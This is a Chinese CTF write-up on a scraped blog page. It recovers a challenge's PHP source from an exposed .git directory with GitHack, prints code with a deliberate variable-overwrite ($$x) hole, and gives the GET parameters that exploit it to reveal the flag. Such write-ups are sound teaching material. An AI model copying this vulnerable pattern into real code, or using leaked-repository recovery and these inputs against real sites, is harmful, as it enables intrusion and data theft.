当前位置: 首页 > news >正文

查看网站域名私人定制网站建设

查看网站域名,私人定制网站建设,百度电脑版官网,一般在什么网站上做电子请帖打开题目 发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下 http://63f29a80-e08b-43ae-a6d0-8e70fb02ea…

打开题目

发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下

http://63f29a80-e08b-43ae-a6d0-8e70fb02eaa3.node5.buuoj.cn:81/.git

主要代码在index里面

<?php
 
include 'flag.php';
 
$yds = "dog";
$is = "cat";
$handsome = 'yds';
 
foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}
 
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
 
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
 
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
 
echo "the flag is: ".$flag;

根据源代码,需要通过get传参达到变量覆盖的目的。 

?yds=flag

覆盖is变量

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

Get或Post传入flag=flag,触发变量覆盖代码

foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}

输出?is=flag&flag=flag

再覆盖覆盖handsome变量

handsome=flag,得到$handsome=$flag

?handsome=flag&flag=handsome

可以得到flag

http://www.yayakq.cn/news/154182/

相关文章:

  • 山东阳信建设局网站做公司 网站建设价格
  • 网站报价单模板深圳博大建设
  • 月流量10g的网站精华吧网页搜题
  • 申请注册网站域名.商城官方网站建设网站
  • 网站开发设计需求文档wordpress 实时推送
  • 天河网站建设方案网站建设中如何发布信息推广
  • 商城网站建设哪个公司好wordpress与saas
  • 下厨房网站学做蒸包视频wordpress安装windows
  • 杭州哪家网站建设比较好手机做兼职的网站
  • html网站开发办公空间设计网站
  • 网站建设算固定资产吗南京做网站南京乐识赞
  • 个人做网站可以盈利么网站域名在哪里申请
  • 成都网站网络建设做诚信通谁给做网站
  • 网站建设凭证网站后台无ftp
  • 网站开发保障合同没有网站也可以做cpa
  • 网站源码cms做植物网站
  • 定制型网站设计如何做企业网站的排名
  • 商务网站的特点网站建设 学习 长沙
  • 义乌外贸网站建设最新的即时比分
  • 做网站买流量个人备案 可以做企业网站吗
  • 番禺建设网站外包wordpress创建大型菜单
  • 广州外贸企业网站建设未来做那些网站致富
  • 做微博类的网站难吗网站建设的工作方法
  • 莒县建设局官方网站类似建站之星网站
  • 可以做水印的网站小红书推广策略
  • 网站制作二级网页怎么做《网站建设与管理》论文
  • 网站开发所需要的书籍阳江做网站的公司
  • 毕业设计网站用什么做北京景观设计公司
  • 建设网站方法有哪些内容自助建站免费自助建站网站
  • 网站建设如何销售系统网站主题有哪些问题